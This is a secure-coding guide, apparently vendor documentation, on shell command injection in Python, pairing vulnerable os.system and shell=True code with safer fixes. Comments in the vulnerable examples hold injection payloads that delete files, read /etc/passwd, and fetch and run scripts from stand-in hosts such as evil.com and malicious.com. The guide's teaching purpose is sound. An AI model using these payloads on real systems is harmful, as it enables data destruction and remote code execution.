Shell Command Injection in Python

Critical Risk Command Injection
pythoncommand-injectionsubprocessos-systemshellrceuser-input

What it is

A critical security vulnerability where user-controlled input is passed to system shell commands through Python's subprocess, os.system(), or similar functions without proper sanitization. This allows attackers to execute arbitrary system commands on the server, potentially leading to complete system compromise, data exfiltration, or remote code execution.

import os
import sys

def process_user_file(filename):
    """Vulnerable file processing function"""
    # VULNERABLE: Direct user input to os.system
    print(f"Processing file: {filename}")
    
    # Check if file exists (ineffective security check)
    if os.path.exists(filename):
        # Vulnerable command construction
        backup_cmd = f"cp {filename} /backup/{filename}.bak"
        os.system(backup_cmd)
        
        # Another vulnerable operation
        size_cmd = f"du -h {filename}"
        os.system(size_cmd)
        
        print("File processed successfully")
    else:
        print("File not found")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: script.py <filename>")
        sys.exit(1)
    
    user_filename = sys.argv[1]
    process_user_file(user_filename)

# Attack examples:
# python script.py "test.txt; rm -rf /home/user; #"
# python script.py "file.txt && wget http://malicious.com/backdoor.py && python backdoor.py"
# python script.py "$(cat /etc/passwd)"
import subprocess
import sys
import re
from pathlib import Path
from typing import Optional

def process_user_file_safe(filename: str) -> bool:
    """Secure file processing function with proper validation"""
    try:
        # Comprehensive input validation
        if not is_valid_filename(filename):
            print("Error: Invalid filename format")
            return False
        
        filepath = Path(filename)
        
        # Security checks
        if not filepath.exists():
            print("Error: File not found")
            return False
            
        if not is_file_in_allowed_directory(filepath):
            print("Error: File not in allowed directory")
            return False
            
        if not is_safe_file_type(filepath):
            print("Error: File type not allowed")
            return False
        
        print(f"Processing file: {filename}")
        
        # SECURE: Use subprocess with argument lists
        backup_dir = Path("/backup")
        backup_dir.mkdir(exist_ok=True)
        
        backup_path = backup_dir / f"{filepath.name}.bak"
        
        # Safe file copy using subprocess
        result = subprocess.run(
            ['cp', str(filepath), str(backup_path)],
            capture_output=True,
            text=True,
            timeout=30
        )
        
        if result.returncode != 0:
            print(f"Error copying file: {result.stderr}")
            return False
        
        # Safe file size check
        size_result = subprocess.run(
            ['du', '-h', str(filepath)],
            capture_output=True,
            text=True,
            timeout=10
        )
        
        if size_result.returncode == 0:
            print(f"File size: {size_result.stdout.strip()}")
        
        print("File processed successfully")
        return True
        
    except subprocess.TimeoutExpired:
        print("Error: Operation timeout")
        return False
    except Exception as e:
        print(f"Error: {e}")
        return False

def is_valid_filename(filename: str) -> bool:
    """Validate filename using strict allowlist"""
    # Allowlist pattern: alphanumeric, dots, hyphens, underscores
    pattern = r'^[a-zA-Z0-9._-]+$'
    
    return (
        1 <= len(filename) <= 255 and  # Reasonable length
        re.match(pattern, filename) and
        '..' not in filename and  # Prevent directory traversal
        not filename.startswith('.') and  # No hidden files
        filename.count('.') <= 2  # Reasonable number of dots
    )

def is_file_in_allowed_directory(filepath: Path) -> bool:
    """Check if file is in allowed directory"""
    allowed_dirs = [
        Path('/home/user/documents').resolve(),
        Path('/tmp/uploads').resolve(),
        Path('/var/uploads').resolve()
    ]
    
    try:
        resolved_path = filepath.resolve()
        return any(
            str(resolved_path).startswith(str(allowed_dir))
            for allowed_dir in allowed_dirs
        )
    except (OSError, RuntimeError):
        return False

def is_safe_file_type(filepath: Path) -> bool:
    """Check if file type is allowed"""
    allowed_extensions = {'.txt', '.csv', '.json', '.xml', '.log'}
    return filepath.suffix.lower() in allowed_extensions

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: script.py <filename>")
        print("Allowed file types: .txt, .csv, .json, .xml, .log")
        sys.exit(1)
    
    user_filename = sys.argv[1]
    success = process_user_file_safe(user_filename)
    sys.exit(0 if success else 1)

💡 Why This Fix Works

The vulnerable code directly passes user input to os.system(), allowing command injection through shell metacharacters. The secure version uses subprocess with argument lists, implements comprehensive input validation, and includes proper error handling and security checks.

import subprocess
import urllib.parse

def download_url(url, output_file):
    """Vulnerable URL download function"""
    # VULNERABLE: Basic URL validation that can be bypassed
    if not url.startswith('http'):
        raise ValueError("URL must start with http")
    
    # VULNERABLE: Using shell=True with user input
    command = f"wget '{url}' -O '{output_file}'"
    
    try:
        result = subprocess.run(
            command, 
            shell=True,  # Dangerous!
            capture_output=True, 
            text=True
        )
        
        if result.returncode == 0:
            print(f"Downloaded {url} to {output_file}")
            return True
        else:
            print(f"Download failed: {result.stderr}")
            return False
    except Exception as e:
        print(f"Error: {e}")
        return False

# Example usage that demonstrates vulnerability:
# download_url("http://example.com/file.txt'; rm -rf /; echo '", "output.txt")
# Results in: wget 'http://example.com/file.txt'; rm -rf /; echo '' -O 'output.txt'
import subprocess
import urllib.parse
import re
from pathlib import Path
from typing import Optional

def download_url_safe(url: str, output_file: str) -> bool:
    """Secure URL download function with proper validation"""
    try:
        # Comprehensive URL validation
        if not is_valid_url(url):
            print("Error: Invalid URL format")
            return False
        
        # Validate output filename
        if not is_valid_output_filename(output_file):
            print("Error: Invalid output filename")
            return False
        
        # Ensure output directory exists and is safe
        output_path = Path(output_file)
        if not is_safe_output_path(output_path):
            print("Error: Output path not allowed")
            return False
        
        # Create output directory if needed
        output_path.parent.mkdir(parents=True, exist_ok=True)
        
        print(f"Downloading {url} to {output_file}")
        
        # SECURE: Use subprocess with argument list (no shell)
        result = subprocess.run(
            [
                'wget',
                '--timeout=30',
                '--tries=3', 
                '--max-redirect=5',
                '--user-agent=SecureDownloader/1.0',
                url,
                '-O',
                str(output_path)
            ],
            capture_output=True,
            text=True,
            timeout=60  # Overall timeout
        )
        
        if result.returncode == 0:
            print(f"Successfully downloaded to {output_file}")
            return True
        else:
            print(f"Download failed: {result.stderr}")
            # Clean up partial download
            if output_path.exists():
                output_path.unlink()
            return False
            
    except subprocess.TimeoutExpired:
        print("Error: Download timeout")
        return False
    except Exception as e:
        print(f"Error: {e}")
        return False

def is_valid_url(url: str) -> bool:
    """Validate URL format and scheme"""
    try:
        parsed = urllib.parse.urlparse(url)
        
        # Check scheme
        if parsed.scheme not in ['http', 'https']:
            return False
        
        # Check hostname
        if not parsed.netloc:
            return False
        
        # Basic hostname validation
        hostname_pattern = r'^[a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?(\.([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?))*$'
        hostname = parsed.netloc.split(':')[0]  # Remove port if present
        
        return (
            len(url) <= 2048 and  # Reasonable URL length
            re.match(hostname_pattern, hostname) and
            not any(char in url for char in ['\n', '\r', '\t'])  # No control characters
        )
    except Exception:
        return False

def is_valid_output_filename(filename: str) -> bool:
    """Validate output filename"""
    # Allowlist pattern for safe filenames
    pattern = r'^[a-zA-Z0-9._-]+$'
    
    return (
        1 <= len(filename) <= 255 and
        re.match(pattern, filename) and
        '..' not in filename and
        not filename.startswith('.') and
        filename.count('.') <= 2
    )

def is_safe_output_path(output_path: Path) -> bool:
    """Check if output path is in allowed directory"""
    allowed_dirs = [
        Path('/tmp/downloads').resolve(),
        Path('/home/user/downloads').resolve()
    ]
    
    try:
        resolved_path = output_path.resolve()
        return any(
            str(resolved_path).startswith(str(allowed_dir))
            for allowed_dir in allowed_dirs
        )
    except (OSError, RuntimeError):
        return False

# Example secure usage:
# download_url_safe("https://example.com/file.txt", "downloads/file.txt")

💡 Why This Fix Works

The vulnerable version uses shell=True which allows command injection through URL or filename manipulation. The secure version uses argument lists, implements comprehensive validation for URLs and filenames, and includes proper error handling and cleanup.

Why it happens

The os.system() function directly executes shell commands and is extremely dangerous when combined with user input. It passes the entire command to the system shell, allowing attackers to inject additional commands using shell metacharacters like semicolons, pipes, or command substitution.

Root causes

Unsanitized User Input in os.system()

The os.system() function directly executes shell commands and is extremely dangerous when combined with user input. It passes the entire command to the system shell, allowing attackers to inject additional commands using shell metacharacters like semicolons, pipes, or command substitution.

Preview example – PYTHON
import os

# VULNERABLE: Direct user input to os.system()
def backup_file(filename):
    os.system(f"cp {filename} /backup/")

# Attack payload: filename = "test.txt; rm -rf /; #"
# Results in: cp test.txt; rm -rf /; # /backup/

Shell=True in subprocess.run() with User Input

Using subprocess with shell=True and user-controlled input creates command injection vulnerabilities. The shell=True parameter enables shell interpretation, allowing attackers to use shell metacharacters to execute additional commands or modify the intended command behavior.

Preview example – PYTHON
import subprocess

# VULNERABLE: subprocess with shell=True and user input
def ping_host(hostname):
    result = subprocess.run(f"ping -c 1 {hostname}", 
                          shell=True, capture_output=True, text=True)
    return result.stdout

# Attack: hostname = "google.com; cat /etc/passwd"
# Results in: ping -c 1 google.com; cat /etc/passwd

String Formatting in Command Construction

Building shell commands using string formatting (f-strings, .format(), % formatting) with user input creates injection points. Even seemingly safe operations like file operations can become dangerous when user input is incorporated into shell commands without validation.

Preview example – PYTHON
import os

# VULNERABLE: String formatting with user input
def compress_directory(directory_name):
    command = "tar -czf {}.tar.gz {}".format(directory_name, directory_name)
    os.system(command)

# Attack: directory_name = "docs; wget http://evil.com/malware.sh; bash malware.sh; #"
# Results in command injection and remote code execution

Insufficient Input Validation

Failing to properly validate and sanitize user input before using it in shell commands. This includes not checking for shell metacharacters, not validating expected formats, and not using allowlists for permitted values. Even basic validation like checking file extensions can be bypassed with clever payloads.

Preview example – PYTHON
import subprocess

# VULNERABLE: Weak validation that can be bypassed
def convert_image(filename):
    # Weak validation - only checks extension
    if not filename.endswith('.jpg'):
        raise ValueError("Only JPG files allowed")
    
    # Still vulnerable to injection
    subprocess.call(f"convert {filename} output.png", shell=True)

# Attack: filename = "file.jpg; rm -rf /home/user; #.jpg"

Fixes

1

Use subprocess with Argument Lists (No Shell)

The safest approach is to use subprocess functions (run, call, Popen) with argument lists instead of shell strings. When shell=False (default), subprocess passes arguments directly to the program without shell interpretation, preventing command injection attacks.

View implementation – PYTHON
import subprocess

# SECURE: Using argument list without shell
def ping_host_safe(hostname):
    # Validate hostname format
    if not is_valid_hostname(hostname):
        raise ValueError("Invalid hostname format")
    
    try:
        result = subprocess.run(
            ['ping', '-c', '1', hostname],  # Argument list
            capture_output=True, 
            text=True, 
            timeout=10  # Prevent hanging
        )
        return result.stdout
    except subprocess.TimeoutExpired:
        return "Ping timeout"

def is_valid_hostname(hostname):
    import re
    # RFC compliant hostname validation
    pattern = r'^[a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?(\.([a-zA-Z0-9]([a-zA-Z0-9\-]{0,61}[a-zA-Z0-9])?))*$'
    return len(hostname) <= 253 and re.match(pattern, hostname)
2

Implement Strict Input Validation and Allowlists

Create comprehensive input validation using allowlists (whitelists) rather than blocklists. Validate expected formats, restrict character sets, implement length limits, and use regular expressions for format checking. Always validate on the server side and never trust client-side validation.

View implementation – PYTHON
import re
import os
from pathlib import Path

# SECURE: Comprehensive input validation
def backup_file_safe(filename):
    # Strict allowlist validation
    if not is_safe_filename(filename):
        raise ValueError("Invalid filename")
    
    # Verify file exists and is in allowed directory
    filepath = Path(filename)
    if not filepath.exists() or not is_in_allowed_directory(filepath):
        raise ValueError("File not found or not in allowed directory")
    
    # Use safe subprocess call
    subprocess.run(['cp', str(filepath), '/backup/'], check=True)

def is_safe_filename(filename):
    # Allowlist: alphanumeric, dots, hyphens, underscores only
    pattern = r'^[a-zA-Z0-9._-]+$'
    return (
        len(filename) <= 255 and  # Reasonable length limit
        re.match(pattern, filename) and
        '..' not in filename and  # Prevent directory traversal
        not filename.startswith('.') and  # No hidden files
        filename.count('.') <= 2  # Reasonable number of dots
    )

def is_in_allowed_directory(filepath):
    allowed_dirs = ['/home/user/documents', '/tmp/uploads']
    try:
        resolved_path = filepath.resolve()
        return any(str(resolved_path).startswith(allowed_dir) 
                  for allowed_dir in allowed_dirs)
    except (OSError, RuntimeError):
        return False
3

Use Parameterized Command Execution Libraries

Leverage libraries specifically designed for safe command execution that handle parameterization and escaping automatically. Consider using shlex.quote() for shell escaping when shell execution is absolutely necessary, though avoiding shell execution entirely is preferred.

View implementation – PYTHON
import subprocess
import shlex
from typing import List, Optional

# SECURE: Using shlex.quote when shell is necessary
def safe_shell_command(command: str, args: List[str]) -> Optional[str]:
    # Only allow specific commands from allowlist
    allowed_commands = {'ls', 'cat', 'grep', 'find'}
    if command not in allowed_commands:
        raise ValueError(f"Command '{command}' not allowed")
    
    # Properly quote all arguments
    quoted_args = [shlex.quote(arg) for arg in args]
    full_command = f"{command} {' '.join(quoted_args)}"
    
    try:
        result = subprocess.run(
            full_command,
            shell=True,  # Only when absolutely necessary
            capture_output=True,
            text=True,
            timeout=30
        )
        return result.stdout
    except subprocess.TimeoutExpired:
        raise RuntimeError("Command timeout")

# BETTER: Avoid shell entirely when possible
def list_directory_safe(directory: str) -> List[str]:
    # Validate directory path
    if not is_safe_directory_path(directory):
        raise ValueError("Invalid directory path")
    
    try:
        result = subprocess.run(
            ['ls', '-la', directory],  # No shell needed
            capture_output=True,
            text=True,
            timeout=10
        )
        return result.stdout.splitlines()
    except subprocess.TimeoutExpired:
        raise RuntimeError("Directory listing timeout")
4

Implement Sandboxing and Privilege Separation

Run command execution in isolated environments with limited privileges. Use containers, chroot jails, or dedicated user accounts with minimal permissions. Implement resource limits, network restrictions, and file system access controls to minimize the impact of successful attacks.

View implementation – PYTHON
import subprocess
import pwd
import grp
import resource

# SECURE: Sandboxed command execution
def execute_sandboxed(command_args: List[str]):
    # Create restricted user environment
    def preexec_fn():
        # Drop privileges to nobody user
        nobody_pwd = pwd.getpwnam('nobody')
        os.setgid(nobody_pwd.pw_gid)
        os.setuid(nobody_pwd.pw_uid)
        
        # Set resource limits
        resource.setrlimit(resource.RLIMIT_CPU, (30, 30))  # 30 second CPU limit
        resource.setrlimit(resource.RLIMIT_AS, (512*1024*1024, 512*1024*1024))  # 512MB memory
        resource.setrlimit(resource.RLIMIT_NPROC, (10, 10))  # Max 10 processes
    
    # Execute in chroot jail
    chroot_env = {
        'PATH': '/usr/bin:/bin',
        'HOME': '/tmp',
        'USER': 'nobody'
    }
    
    try:
        result = subprocess.run(
            command_args,
            preexec_fn=preexec_fn,
            env=chroot_env,
            cwd='/tmp',
            capture_output=True,
            text=True,
            timeout=60
        )
        return result.stdout
    except subprocess.TimeoutExpired:
        raise RuntimeError("Sandboxed command timeout")
    except Exception as e:
        raise RuntimeError(f"Sandboxed execution failed: {e}")

Detect This Vulnerability in Your Code

Sourcery automatically identifies shell command injection in python and many other security issues in your codebase.